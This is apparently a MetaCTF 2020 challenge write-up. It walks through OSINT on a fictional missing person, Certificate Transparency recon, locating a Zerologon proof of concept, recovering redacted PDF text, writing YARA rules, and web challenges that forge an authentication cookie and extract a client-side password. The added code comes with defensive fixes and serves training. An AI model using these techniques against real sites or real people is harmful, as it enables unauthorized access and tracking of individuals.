There is a database folder a few layers down that has an edit date of September 13th at around 10:00 PM EST. What’s in there?
Check out the log file for anything interesting. We find an address by searching the file for the word “meet,” as the challenge suggests.
Therefore, the flag is MetaCTF{933 English Muffin Way}
.
Multimedia
Watermarked
250 points/solved by 146 teams
Sonic watermarks are a security measure used by many different actors in the audio recording industry. Audio engineers sometimes mix them into unfinished tracks in case they are leaked outside of the studio, and developers of VST plugins often manipulate the generated sound to limit those using free trial or cracked versions of their software.
You are an audio engineer working with famous post-lingual rapper Playball Carl, and you’ve been alerted to a leak that just surfaced on SoundCloud. Recover the watermark to find the identity of the leaker.
Studio Version vs. Leaked Version
Actual track ID: wido — 1292Forex
This challenge requires a basic understanding of audio engineering. We are given two seemingly identical FLAC files, same length and near-identical spectrograms, but one of them contains an inaudible watermark. Spectral analysis alone does not reveal it, so we need another way to isolate whatever differs between the two tracks.
If you play two identical audio tracks simultaneously with one of them phase-inverted, they cancel out completely; whatever remains is exactly the difference between them. This is the null test audio engineers use to compare mixes. Import both tracks into the same Audacity project, select one track, apply Effect > Invert to it, and then play both together:
When we hit play, we don’t hear any music but instead what sounds like a text-to-speech program reading off each character of the flag, which comes out to the following:
MetaCTF{p4r7ing_7h3_w4v3z}
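The null test scripted with the standard library, added as an example rather than the Audacity steps above. It constructs two 16-bit mono WAVs (a tone, and the same tone with a very quiet second tone mixed in as a stand-in watermark) instead of using the challenge FLACs; recover_watermark() normalises the residue so a quiet watermark becomes audible.

```python
import io
import math
import struct
import wave
from typing import List, Tuple

# Added example, not from the writeup: the same null test scripted with the standard
# library. Two 16-bit mono WAVs are constructed below (a tone plus a very quiet second
# tone standing in for the watermark), so nothing here is the challenge's FLAC audio.
RATE = 8000


def write_wav(samples: List[int], rate: int = RATE) -> bytes:
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(struct.pack("<%dh" % len(samples), *samples))
    return buf.getvalue()


def read_wav(data: bytes) -> Tuple[List[int], int]:
    with wave.open(io.BytesIO(data), "rb") as w:
        if w.getnchannels() != 1 or w.getsampwidth() != 2:
            raise ValueError("16-bit mono only")
        frames = w.readframes(w.getnframes())
        return list(struct.unpack("<%dh" % (len(frames) // 2), frames)), w.getframerate()


def null_test(a: List[int], b: List[int]) -> List[int]:
    """Mix a with phase-inverted b (a - b). Identical, sample-aligned tracks cancel to silence."""
    if len(a) != len(b):
        raise ValueError("tracks must be the same length; align them first")
    return [max(-32768, min(32767, x - y)) for x, y in zip(a, b)]


def peak_dbfs(samples: List[int]) -> float:
    peak = max((abs(s) for s in samples), default=0)
    return -math.inf if peak == 0 else 20 * math.log10(peak / 32768)


def recover_watermark(studio_wav: bytes, leak_wav: bytes) -> bytes:
    """Null the studio track against the leak and normalise the residue so it is audible."""
    studio, r1 = read_wav(studio_wav)
    leak, r2 = read_wav(leak_wav)
    if r1 != r2:
        raise ValueError("sample rates differ; resample first")
    residue = null_test(leak, studio)
    peak = max((abs(s) for s in residue), default=0)
    gain = 32767 / peak if peak else 1.0
    return write_wav([int(s * gain) for s in residue], r1)


def tone(freq: float, seconds: float, amp: int, rate: int = RATE) -> List[int]:
    n = int(seconds * rate)
    return [int(amp * math.sin(2 * math.pi * freq * i / rate)) for i in range(n)]


# Constructed stand-ins for the two FLACs.
STUDIO = tone(440, 0.5, 12000)
WATERMARK = tone(3000, 0.5, 60)                 # roughly -55 dBFS: buried under the music
LEAK = [s + m for s, m in zip(STUDIO, WATERMARK)]

if __name__ == "__main__":
    print("studio vs studio:", peak_dbfs(null_test(STUDIO, STUDIO)), "dBFS")
    print("leak vs studio:", peak_dbfs(null_test(LEAK, STUDIO)), "dBFS")
    with open("watermark.wav", "wb") as fh:
        fh.write(recover_watermark(write_wav(STUDIO), write_wav(LEAK)))
```

The test only works if the two files are sample-aligned and at the same rate, which is why the FLAC pair here is a clean case; a leak that has been re-encoded as lossy MP3 leaves a residue of codec noise everywhere, and the watermark then has to be picked out of that.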
Reconnaissance
Big Breaches
150 points/solved by 718 teams
How many unique emails were exposed in the biggest single collection of breached usernames/passwords? Provide the answer (flag) in the format MetaCTF{###,###}.
The biggest single collection of breached usernames and passwords available online is almost certainly Collection #1 from January 2019. Troy Hunt's analysis of it, which comes up in a quick search, puts it at 772,904,991 unique email addresses (alongside 21,222,975 unique passwords). The flag is MetaCTF{772,904,991}
.
Not So Itsy Bitsy Spider
200 points/solved by 710 teams
Recent reporting indicates that a prominent ransomware operator, known as WIZARD SPIDER, was able to deploy Ryuk ransomware in an environment within 5 hours of compromise.
What recent, critical vulnerability was exploited in this environment to gain elevated privileges?
The flag will be in the following format:
CVE-XXXX-XXXX
Since the challenge asks for a "recent" and "critical" vulnerability used in a Ryuk intrusion, try searching online for "Ryuk CVE 2020" and check whether any critical vulnerabilities appear in the results.
The first result mentions CVE-2020-1472, also known as Zerologon. It is an elevation-of-privilege vulnerability in the Windows Netlogon Remote Protocol that lets an unauthenticated attacker on the network take over a domain controller. Does NIST (which maintains the National Vulnerability Database and assigns CVSS severity scores to CVEs) rate it as critical?
Yes: it carries a CVSS score of 10.0. The flag is CVE-2020-1472.
Diving into the announcement
225 points/solved by 499 teams
Vulnerabilities are patched in software all the time, and for the most serious ones, researchers work to build proof-of-concept (POC) exploits for them. As defenders, we need to continuously monitor when new public exploits drop, figure out how they work, and ensure we’re protected against them. Recently, Microsoft announced CVE-2020-1472. Your task is to locate a public exploit for it and identify the vulnerable function that the POCs call. The flag will be the function’s name.
A great place to find POCs for various exploits is GitHub. Start by searching for the CVE there. This repo containing a POC Python script looks like a good one. Since CVE-2020-1472 is a Netlogon elevation-of-privilege vulnerability, the relevant calls in the repo come from the Netlogon Remote Protocol (nrpc) bindings, and the RPC methods themselves carry Netr… names. Helpfully, the script has a function called exploit() that calls NetrServerPasswordSet2(), the method through which the bug is abused to reset the domain controller's machine account password. As it is the only RPC call made in exploit(), this ended up being the flag.
Finding Mr. Casyn
275 points/solved by 307 teams
This is the first of three challenges related to the Casyn persona.
We’re looking for a Mr. Casyn, who has been reported missing. We believe he lives in the Chicagoland area, but don’t think he’s in Illinois proper. We need your help finding him and identifying the right Mr. Casyn will help us begin our search.
The flag for this challenge is the first name of Mr. Casyn. There are three attempts available for this challenge.
Note: Mr. Casyn is a fake persona that we have created to help you practice your OSINT skills.
To begin this challenge, let’s gather what we know about our persona:
- Last name: Casyn
- Lives in: Chicagoland area
- Lives in: not Illinois
First, let’s search for a Mr. Casyn and see what comes up:
The top results do not point towards an obvious answer, and with 128,000 results it would be infeasible to look through them manually. Instead, let’s narrow the search. We know the general area where he lives: Chicagoland, outside of Illinois. According to Wikipedia, the Chicagoland area comprises the following cities:
We see three cities outside of Illinois: Kenosha, Wisconsin, Hammond, Indiana, and Gary, Indiana. Let’s try attaching these cities to Casyn’s name in our search. The results for searching “casyn hammond” are below:
Sure enough, we found the Facebook profile of a Vedder Casyn, who turned out to be the target. Unfortunately, the Facebook profile was taken down shortly after the challenge started (we’re unsure why), but we were able to use that name to discover his Twitter profile:
Now we have his name and his website: veddercasyn.me.
Complete Transparency
325 points/solved by 206 teams
At ICMP Industries, we recently created a new subdomain off of our company website. Since our new super secret project is still in development, we chose a long subdomain so no one will know to visit it yet. We also went ahead and upgraded the site to use HTTPS to be more secure.
The flag is the name of our secret subdomain. Note there are dashes between words instead of underscores since it’s a domain name.
Let’s try visiting https://icmpindustries.com/.
The company may not be hosting anything on the main site, but the challenge says they enabled HTTPS on the subdomain, which means a publicly trusted certificate was issued for it. Certificate Transparency (hence the challenge name) has publicly trusted CAs publish every certificate they issue to public, append-only logs, so a "secret" hostname becomes searchable the moment its certificate is issued; only a wildcard certificate would have kept the label out of the logs. Search the certificate logs with a tool such as Censys or crt.sh for names under icmpindustries.com.
The flag is a-transparent-but-not-invisible-flag.icmpindustries.com.
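Pulling the same names out of Certificate Transparency logs through crt.sh's JSON output, added as an example (not the team's Censys query). The fetch function needs network access; the parsing is exercised against a constructed response shaped like crt.sh's output, using the hostnames from this challenge.

```python
import json
import urllib.parse
import urllib.request
from typing import List, Set

# Added example, not from the writeup. crt.sh answers ?q=%.<domain>&output=json with a
# list of log entries whose name_value field holds newline-separated SANs.
# SAMPLE_BODY below is constructed in that shape; it is not a real crt.sh response.


def ct_names_from_json(body: str, domain: str) -> List[str]:
    """Collect every hostname under `domain` seen in crt.sh JSON output, de-duplicated."""
    names: Set[str] = set()
    for entry in json.loads(body):
        for name in entry.get("name_value", "").split("\n"):
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]            # a wildcard reveals nothing about the hidden label
            if name == domain or name.endswith("." + domain):
                names.add(name)
    return sorted(names)


def fetch_ct_names(domain: str, timeout: float = 30.0) -> List[str]:
    """Live lookup against crt.sh (network access required; not exercised offline)."""
    url = "https://crt.sh/?" + urllib.parse.urlencode({"q": "%." + domain, "output": "json"})
    req = urllib.request.Request(url, headers={"User-Agent": "ct-recon-example/1.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return ct_names_from_json(resp.read().decode("utf-8"), domain)


SAMPLE_BODY = json.dumps([
    {"common_name": "icmpindustries.com",
     "name_value": "icmpindustries.com\nwww.icmpindustries.com"},
    {"common_name": "a-transparent-but-not-invisible-flag.icmpindustries.com",
     "name_value": "a-transparent-but-not-invisible-flag.icmpindustries.com"},
    {"common_name": "*.icmpindustries.com",
     "name_value": "*.icmpindustries.com"},
    {"common_name": "notmine.example",
     "name_value": "icmpindustries.com.notmine.example"},
])

if __name__ == "__main__":
    for name in ct_names_from_json(SAMPLE_BODY, "icmpindustries.com"):
        print(name)
```

The suffix check is written as "." + domain on purpose: a bare endswith("icmpindustries.com") would also accept unrelated names such as notmyicmpindustries.com, and the last sample entry shows that a lookalike placed in front of another domain is filtered out as well.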
Ring Ring
325 points/solved by 221 teams
This is the second of three challenges related to the Casyn persona.
We want to try and reach out to Mr. Casyn via telephone. Can you figure out his phone number?
Flag format: XXX-XXX-XXXX. Example: 123–456–7890
Here’s the information we currently know about Mr. Casyn:
- Full name: Vedder Casyn
- Lives in: Hammond, IN
- Facebook profile: https://www.facebook.com/vedder.casyn.5
- Linkedin profile: https://www.linkedin.com/in/vedder-casyn/
- Twitter profile: https://twitter.com/veddercasyn/with_replies
- Github profile: https://github.com/veddercasyn/
- Website: https://veddercasyn.me/
We’re looking for his phone number, but unfortunately, it doesn’t appear on any of the accounts above, and the cached content of his profiles and website does not reveal anything either. However, it is possible that Vedder had more information on his website in the past and later removed it. Since the site is hosted from a GitHub repository, every edit survives in its commit history. Going to https://veddercasyn.github.io/index.md and looking at the commit history gives us a few dozen commits, a lot, but nothing that we can’t look through manually, and each one is relatively small (cloning the repository and running git log -p -- index.md shows the same diffs in one scroll). Looking at commit 9257913276447d19f8e08d91ebce83743ff11063, we see the following change:
And there’s his phone number: 929-249-4018.
Hangout Spots
525 points/solved by 127 teams
This is the third of three challenges related to the Casyn persona.
There was no reply from Mr. Casyn’s phone. Can you find out where he likes to frequently hang out so we can look for clues of where he’s been recently? Once you find the image, think of how we can use what we know to geolocate the image based on what’s in the picture.
Flag format is street name, city, state abbreviation zip code. Example: 301 Park Ave, New York, NY 10022
Side note: enjoying the OSINT? Check out https://www.tracelabs.org/ for ways that you can put those skills to use!
Now we have his phone number, but we need to find his exact location. The problem asks to find a common hangout spot, but his website only has this:
He says he doesn’t go here often and the address of this building (discovered through reverse image search) wasn’t the answer. Remembering what we did in the Ring Ring challenge, let’s go back to his GitHub version history and see if we can uncover anything.
At one point, Mr. Casyn revealed his hangout spot. The removed Imgur link above contains the following image:
Now we must discover the location of this building. On the left-hand side of the image we can faintly see a Google watermark, so it is most likely a screenshot from Google Maps Street View. Unfortunately, a screenshot carries no useful EXIF data. Something is visible in the upper-left window, but we can’t make out what it is, so we’ll have to use landmarks in the image to find the location instead.
Behind the building we can see a tall lattice tower carrying several radome-covered antennas. Anyone into amateur radio will know that tall antenna structures in the United States (generally those over 200 feet, or near an airport) must be registered with the FCC.
Fortunately, the FCC’s Antenna Structure Registration (ASR) database is public and lists every registered structure along with its exact coordinates.
Let’s try an advanced search and put in Hammond, IN, but only for towers that are constructed:
We obtained 18 results, a number reasonable enough to look through manually:
We can take the coordinates of each site and put them into Google Maps. Now let’s look at the antenna tower registered to the Hammond Police Department, the sixth result in the list, from the coordinates listed. Go into the street view for a better look at the tower.
That certainly looks similar to the tower in the image removed from Mr. Casyn’s website. Since we know what the building roof in the original image looks like, let’s look around for it in the satellite view.
The Hammond Public Library, across the street from the police station, looks sort of like the one in our original picture: similar roof, similar parking lot, similar trees. Let’s go down to the street view and see if it matches.
We have a match! Going into street view on State Street right outside the Hammond Public Library gives us the image that Mr. Casyn previously published on his website. Finally, we know his hangout spot.
The flag is the address of the library: 564 State St, Hammond, IN 46320
.
Side note: Yes, I am enjoying the OSINT! In fact, I participated in my first Trace Labs Search Party just last week at conINT!
Reverse Engineering
[REDACTED]
225 points/solved by 509 teams
The CEO of Cyber Corp has strangely disappeared over the weekend. After looking more into his disappearance, the local Police Department thinks he might have gotten caught up in some illicit activities.
The IT Department just conducted a search through his company-provided laptop and found an old memo containing a One-Time Password to log into his e-mail. However, it seems as if someone has redacted the code; can you recover it for us?
The given PDF is a scan of a paper document with a censor bar drawn on top of it, probably in some PDF editor. Drawing a box over a scanned page does not alter the scan: the page image is one object in the PDF and the bar is a separate object layered above it, so the original pixels are still in the file. First, let’s see what the PDF looks like:
We will use peepdf to list the objects in the PDF:
Object 5 is by far the largest, so it’s safe to assume that it holds the scanned page image. Let’s dump its raw stream (the JPEG data as stored) to a file with rawstream:
PPDF> rawstream 5 > docoutput.jpg
(pdfimages -j from poppler-utils would extract the same image without the interactive session.) We can now see the original scan with the redacted text intact:
The flag is MetaCTF{politics_are_for_puppets}.
Precision Matching
375 points/solved by 16 teams
YARA describes itself as a pattern matching swiss knife for malware researchers. I like to think of it though as a precision strike weapon (without the explosion part of course) for seeking out malware based on a configurable, very specific set of characteristics. In addition, it’s quite helpful for identifying related samples built by the same malware author. We recently uncovered a malware author using
a) dynamic imports for their calls to CreateRemoteThread, and
b) Visual Studio 2019.
Here’s the one sample we’ve managed to recover so far. We’d like you to visit our YARA Rule Making Studio and craft a rule to match only these characteristics — no false positives!
About Yara
Yara, created by VirusTotal, is a signature-based method for detecting malware (and many other things). Looking at the documentation for writing Yara rules is helpful for this challenge. The challenge creator has helpfully provided us with a website to check our solution.
We are given an empty YARA rule to start with, whose condition is always false:
rule yarp {
    condition:
        false
}
This doesn’t detect any of the files as infected.
Matching on Strings
The first signature we need to match on is the dynamic import used for calls to CreateRemoteThread. Define a new string variable with the value CreateRemoteThread. When a string is defined, it must also be referenced in the rule's condition, which tells YARA how to use it; a string that is defined but never referenced is a compile error. Currently, our rule looks like this:
rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        $crt
}
Hmmm… this rule matches all of the samples.
Limiting scope
Given that result, every file the site checks against the rule references CreateRemoteThread somewhere, which makes sense: a statically imported function appears by name in the import table as well, so the string alone does not distinguish a dynamic import. What does distinguish the provided binary is where the string sits. Examining it, the strings associated with the dynamic calls to CreateRemoteThread only appear in the first part of the file, up to offset 0x2CC50. YARA lets us restrict where a string may match with the in operator and an offset range. Set the rule to search from the beginning of the file (offset 0) up to 0x2CC50.
rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        $crt in (0x0..0x2CC50)
}
We are getting closer!
We are getting closer!
Avoiding false positives
This is still not enough to rule out false positives, so add the second characteristic: the sample was built with Visual Studio 2019. Because we are analyzing .exe (Portable Executable, PE) files, each one carries an optional header whose MajorLinkerVersion and MinorLinkerVersion fields record the linker that produced it. The MSVC toolset shipped with Visual Studio 2019 is 14.2x, so its linker stamps major version 14 and a minor version of 20 through 29 (Visual Studio 2017 used 14.1x and Visual Studio 2015 14.0; the "2019" in the product name is not the version the linker writes). YARA exposes these fields through its pe module as pe.linker_version.major and pe.linker_version.minor, so add a condition that the minor version is greater than 20, which is what separated the sample from the false positives on the checker. Strictly, 20 is itself a Visual Studio 2019 value, and a tighter rule would also pin the major version to 14 and bound the minor version below 30 so that Visual Studio 2022 builds (14.3x) do not match. The pe module must be imported at the top of the rule for this to work, and the two conditions must be joined with and.
import "pe"

rule yarp {
    strings:
        $crt = "CreateRemoteThread"
    condition:
        $crt in (0x1..0x0002CC50) and
        pe.linker_version.minor > 20
}
Does the rule pass?
Yes! The flag is MetaCTF{wielding_the_mighty_power_of_yara_to_stop_the_hackers}.
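To make clear what the final rule actually evaluates, here is an added example (not part of the original writeup or the challenge) that reimplements its two conditions in Python: it reads MajorLinkerVersion and MinorLinkerVersion out of the PE optional header the same way the pe module does, and checks that some occurrence of the string starts inside the offset range, which is the semantics of YARA's in operator. The "files" it runs against are constructed stubs built by build_sample (a DOS header, PE signature, COFF header and the first bytes of an optional header, followed by padding and the string); they are not real executables and the names rule_yarp, rule_yarp_strict and the sample constants are this example's own.

```python
import struct
from typing import Tuple

CRT = b"CreateRemoteThread"
SCAN_LO, SCAN_HI = 0x1, 0x0002CC50   # the offset range used in the writeup's rule


def linker_version(data: bytes) -> Tuple[int, int]:
    """Return (MajorLinkerVersion, MinorLinkerVersion) from the PE optional header.

    Layout: DOS header (e_lfanew at 0x3C) -> "PE\\0\\0" -> 20-byte COFF header ->
    optional header, whose first bytes are Magic (u16), MajorLinkerVersion (u8),
    MinorLinkerVersion (u8). These are the fields behind pe.linker_version.
    """
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20
    magic, major, minor = struct.unpack_from("<HBB", data, opt)
    if magic not in (0x10B, 0x20B):        # PE32 / PE32+
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return major, minor


def string_in_range(data: bytes, needle: bytes, lo: int, hi: int) -> bool:
    """YARA's `$s in (lo..hi)`: some occurrence of needle starts at an offset in [lo, hi]."""
    pos = data.find(needle, lo)
    return pos != -1 and pos <= hi


def rule_yarp(data: bytes) -> bool:
    """The writeup's final rule: $crt in (0x1..0x2CC50) and pe.linker_version.minor > 20."""
    _major, minor = linker_version(data)
    return string_in_range(data, CRT, SCAN_LO, SCAN_HI) and minor > 20


def rule_yarp_strict(data: bytes) -> bool:
    """Tighter variant: pin the linker to the Visual Studio 2019 toolset (14.20-14.29)
    so that Visual Studio 2022 builds (14.3x) do not also match."""
    major, minor = linker_version(data)
    return (string_in_range(data, CRT, SCAN_LO, SCAN_HI)
            and major == 14 and 20 <= minor <= 29)


def build_sample(major: int, minor: int, body: bytes, e_lfanew: int = 0x80) -> bytes:
    """Constructed stand-in for a PE file: valid DOS stub, signature, COFF header and
    the start of an optional header, followed by `body`. Not a runnable executable."""
    buf = bytearray(b"MZ" + b"\x00" * 62)
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf += b"\x00" * (e_lfanew - len(buf))
    buf += b"PE\x00\x00"
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    buf += struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)
    # Optional header: Magic (PE32), MajorLinkerVersion, MinorLinkerVersion
    buf += struct.pack("<HBB", 0x10B, major, minor)
    buf += body
    return bytes(buf)


# Constructed samples (labelled as such): a VS 2019 build (linker 14.26) that names
# CreateRemoteThread early in the file, a VS 2017 build (14.16) with the same string,
# a VS 2019 build whose only copy of the string lies past 0x2CC50, and a VS 2022
# build (14.33) that the writeup's rule still matches but the strict variant rejects.
VS2019_EARLY = build_sample(14, 26, b"\x00" * 0x100 + b"GetProcAddress\x00" + CRT + b"\x00")
VS2017_EARLY = build_sample(14, 16, b"\x00" * 0x100 + b"GetProcAddress\x00" + CRT + b"\x00")
VS2019_LATE = build_sample(14, 26, b"\x00" * 0x30000 + CRT + b"\x00")
VS2022_EARLY = build_sample(14, 33, b"\x00" * 0x100 + CRT + b"\x00")

if __name__ == "__main__":
    for name, sample in [("VS2019_EARLY", VS2019_EARLY), ("VS2017_EARLY", VS2017_EARLY),
                         ("VS2019_LATE", VS2019_LATE), ("VS2022_EARLY", VS2022_EARLY)]:
        print(name, linker_version(sample), rule_yarp(sample), rule_yarp_strict(sample))
```

Running it prints one line per sample with the parsed linker version and the verdict of each rule variant; swapping the constructed samples for real files read with open(path, "rb") turns it into a quick sanity check of what a candidate rule will match before submitting it to a checker.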
Web Exploitation
High Security Fan Page
125 points/solved by 832 teams
Uh oh, I woke up to hear that some Swifties seem to have sabotaged my Katy Perry fan page! After writing about why KP is clearly the better artist, I believe they hacked into the system and somehow changed my password! I need to publish a big story today before TMZ steals my scoop, however I can’t find my way back into the admin panel. Can you please help me out by finding my password so I can get back to work?
Note: Obviously most sites aren't built like this, but it's good to get familiar with how a website's source code looks, how resources get loaded in, etc. :)
By checking out the source code through the developer console, we can see a framework.js script loaded. This script contains the function authenticate():
function authenticate(){
var username = document.getElementById("inputUsername").value;
var password = document.getElementById("inputPassword").value;
var notFailed = true;
if(username!="ChrisM"){
alert("You did not enter the correct username!");
notFailed = false;
}
if(password!="MetaCTF{So_You_Wanna_Play_With_Magic}"){
alert("You did not enter the correct password!");
notFailed = false;
}
if(notFailed){
alert("Hiya!");
window.location.pathname = './a3263ca2855a26f06bd679ac3e240af9/adminpanel.html';
}
}
Client-side authentication is unsafe because the check, and with it the credential it compares against, is delivered to every visitor's browser, where it can be read in the developer tools and modified at will; the path to the admin panel is visible in the same function. Authentication decisions have to be made on the server, against a stored password hash rather than the password itself. The flag is MetaCTF{So_You_Wanna_Play_With_Magic}.
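The following is an added example, not code from the writeup or the challenge site, showing both halves of this lesson in Python: the attacker's side, a small regex pass that pulls out every string literal a script compares a password field against (the automated form of "view source"), and the defender's side, the server-side check that should have existed instead, storing a salted PBKDF2 hash and comparing in constant time. SAMPLE_JS is a constructed script shaped like the challenge's authenticate(); make_credential, verify_credential and demo_store are this example's own names, and the stored password is invented.

```python
import hashlib
import hmac
import os
import re

# Offensive side: the automated version of "view source". Pull every string literal
# that a script compares a password field against. The pattern covers the
# `password!="..."` shape used by the challenge's authenticate() and its ==/===
# variants; it is a heuristic, not a JavaScript parser.
SECRET_RE = re.compile(r"password\s*(?:!==?|===?)\s*[\"']([^\"']*)[\"']")


def extract_client_side_secrets(js_source: str) -> list:
    return SECRET_RE.findall(js_source)


# Defensive side: the check belongs on the server, and the server should store a
# salted password hash rather than the password. PBKDF2-HMAC-SHA256 is used here
# because it is in the standard library everywhere; scrypt or Argon2 are the
# stronger choices for a real deployment.
ITERATIONS = 100_000


def make_credential(username: str, password: str, salt: bytes = None) -> dict:
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"username": username, "salt": salt, "hash": digest}


def verify_credential(store: dict, username: str, password: str) -> bool:
    record = store.get(username)
    # Hash against a dummy salt for unknown users so the response time does not
    # reveal which usernames exist; compare_digest keeps the hash comparison
    # constant-time as well.
    salt = record["salt"] if record else b"\x00" * 16
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    expected = record["hash"] if record else b"\x00" * len(candidate)
    return hmac.compare_digest(candidate, expected) and record is not None


def demo_store() -> dict:
    """Constructed credential store with a fixed salt so results are reproducible."""
    cred = make_credential("ChrisM", "correct horse battery staple", salt=b"\x01" * 16)
    return {cred["username"]: cred}


# Constructed sample: a script shaped like the challenge's framework.js.
SAMPLE_JS = '''
function authenticate(){
  var password = document.getElementById("inputPassword").value;
  if(password!="MetaCTF{So_You_Wanna_Play_With_Magic}"){
    alert("You did not enter the correct password!");
  }
}
'''

if __name__ == "__main__":
    print("secrets in client script:", extract_client_side_secrets(SAMPLE_JS))
    store = demo_store()
    print("server-side check, right password:",
          verify_credential(store, "ChrisM", "correct horse battery staple"))
    print("server-side check, wrong password:", verify_credential(store, "ChrisM", "guess"))
    print("server-side check, unknown user:  ", verify_credential(store, "nobody", "guess"))
```

The point of the defensive half is that nothing sent to the browser, and nothing stored on the server, contains the password: a leaked credential store yields hashes that still have to be brute-forced, and a leaked script yields nothing at all.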
Barry’s Web Application
150 points/solved by 781 teams
I’ve made this cool new web application that I plan to use to host a blog. Please check it out at
http://host1.metaproblems.com:5620/
Right now it’s still currently being built, but I hope you enjoy what’s there so far!
Browsing to the provided address gives us the webpage.
To access the documents, we might try spidering the webpage to see what other directories are available. An easy way to do this is with ZAP’s spider.
By default, ZAP won’t try to spider above the lowest directory indicated in the URL field, so set it to http://host1.metaproblems.com:5620/dev/.
It isn't even necessary to spider, because directory browsing is enabled and the documents directory already shows up in the results. Directory listing can expose hidden scripts, include files, backup copies of source, and other files that were never meant to be linked, which is why it should be disabled on production servers (Options -Indexes in Apache, autoindex off in nginx) and why anything sensitive should be kept outside the web root regardless. Browse to /docs to find the hidden files. The flag is MetaCTF{Dont_l3t_y0ur_d1rect0ries_b3_l1st3d}.
Everyone Loves a Good Cookie
175 points/solved by 615 teams
Cookies are used by websites to keep track of user sessions and help with authentication. Can you spot the issue with this site and convince it that you’re authenticated?
The website asks for a secret code to log in.
It sets a cm-authenticated cookie with the value 0 when an incorrect secret code is entered.
We can manipulate this cookie using BurpSuite. First, make sure that your browser is configured to use BurpSuite’s proxy. Then, on the Proxy tab, turn on Intercept and browse to the challenge site in your browser.
The raw request is seen in BurpSuite.
Right-click anywhere in the request and select “Send to Repeater.” This will allow us to manipulate the cookie value. The Repeater tab should light up. In the Params tab, double-click the value of the cookie to edit it. Set the value to 1. Also, remove the password field using the button on the right so that the cookie isn’t set back to 0 when the request is submitted.
Now click the “Send” button.
The raw response is displayed on the right. The site trusts a flag that the client controls outright; the fix is to keep the authenticated state on the server (a random session ID that indexes server-side state) or, at minimum, to sign the cookie so that an edited value fails verification. The flag is MetaCTF{oscar_says_i_love_trash_and_cookies}.
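An added example (not from the writeup or the challenge) that reproduces what the Repeater edit does and why it works, in Python: the cookie parsing, the check a server like this one evidently performs, the raw request that Repeater ends up sending with the edited cookie and no password field, and the HMAC-signed cookie that defeats the edit. FAILED_LOGIN_SET_COOKIE is a constructed reproduction of the header line rather than a capture, the host name challenge.example is a placeholder, and KEY is an example value; is_authenticated_vulnerable, sign_cookie and is_authenticated_signed are this example's own names.

```python
import hashlib
import hmac

# The cookie the challenge site sets after a failed login, as seen in Burp
# (constructed reproduction of the header line, not a capture from the site).
FAILED_LOGIN_SET_COOKIE = "cm-authenticated=0; Path=/"


def set_cookie_pair(header: str) -> tuple:
    """Name and value from a Set-Cookie header, ignoring attributes like Path."""
    name, value = header.split(";", 1)[0].split("=", 1)
    return name.strip(), value.strip()


def parse_cookie_header(header: str) -> dict:
    """Split a Cookie request header into a dict of name -> value."""
    out = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" in part:
            name, value = part.split("=", 1)
            out[name.strip()] = value.strip()
    return out


def is_authenticated_vulnerable(cookies: dict) -> bool:
    """What the challenge server evidently does: trust a client-controlled flag."""
    return cookies.get("cm-authenticated") == "1"


def build_raw_request(host: str, path: str, cookies: dict) -> str:
    """The request Repeater sends after the edit: a plain GET with the modified Cookie
    header and no password field, so the server has nothing to reset the cookie with."""
    cookie = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n"


# Fix: the server signs anything it hands to the client and verifies the signature
# on the way back, so a value the client edits no longer verifies. A server-side
# session store is the more common choice and avoids the question entirely.
KEY = b"example-server-secret-do-not-reuse"   # example value only


def sign_cookie(value: str, key: bytes = KEY) -> str:
    tag = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def is_authenticated_signed(cookies: dict, key: bytes = KEY) -> bool:
    raw = cookies.get("cm-authenticated", "")
    value, sep, tag = raw.rpartition(".")
    if not sep:
        return False                      # unsigned value, e.g. a hand-edited "1"
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected) and value == "1"


if __name__ == "__main__":
    name, value = set_cookie_pair(FAILED_LOGIN_SET_COOKIE)
    print("server set:", name, "=", value)
    forged = {name: "1"}                                # the Repeater edit
    print(build_raw_request("challenge.example", "/", forged))
    print("vulnerable check accepts forged cookie:", is_authenticated_vulnerable(forged))
    print("signed check accepts forged cookie:   ", is_authenticated_signed(forged))
    legit = {name: sign_cookie("1")}
    print("signed check accepts server-issued:   ", is_authenticated_signed(legit))
```

Signing only stops tampering; it does not stop replay of a signed cookie that has been stolen, which is why a short expiry inside the signed value, or a server-side session that can be revoked, is still needed.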
Bonus Flags
CyberGames 2020 Design Bonus
75 points
There was a bonus flag hidden in this year’s CyberGames logo.
- The octal on the bottom left decodes to welcome_to_the_.
- The hex on the top left decodes to CyberGames_shall_we_.
- The Morse code around the inner circle decodes to play_a_.
- The binary on the right decodes to game?.
The bonus flag is MetaCTF{welcome_to_the_CyberGames_shall_we_play_a_game?}.
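For anyone who wants to check the four readings rather than take them on trust, here is an added example (not part of the original post) with small decoders for each encoding used in the logo. The inputs are constructed here by re-encoding the known fragments, since the logo itself is an image; the decoders are general, so they also handle digits run together without separators and Morse text with " / " between words.

```python
MORSE_TO_CHAR = {
    ".-": "a", "-...": "b", "-.-.": "c", "-..": "d", ".": "e", "..-.": "f", "--.": "g",
    "....": "h", "..": "i", ".---": "j", "-.-": "k", ".-..": "l", "--": "m", "-.": "n",
    "---": "o", ".--.": "p", "--.-": "q", ".-.": "r", "...": "s", "-": "t", "..-": "u",
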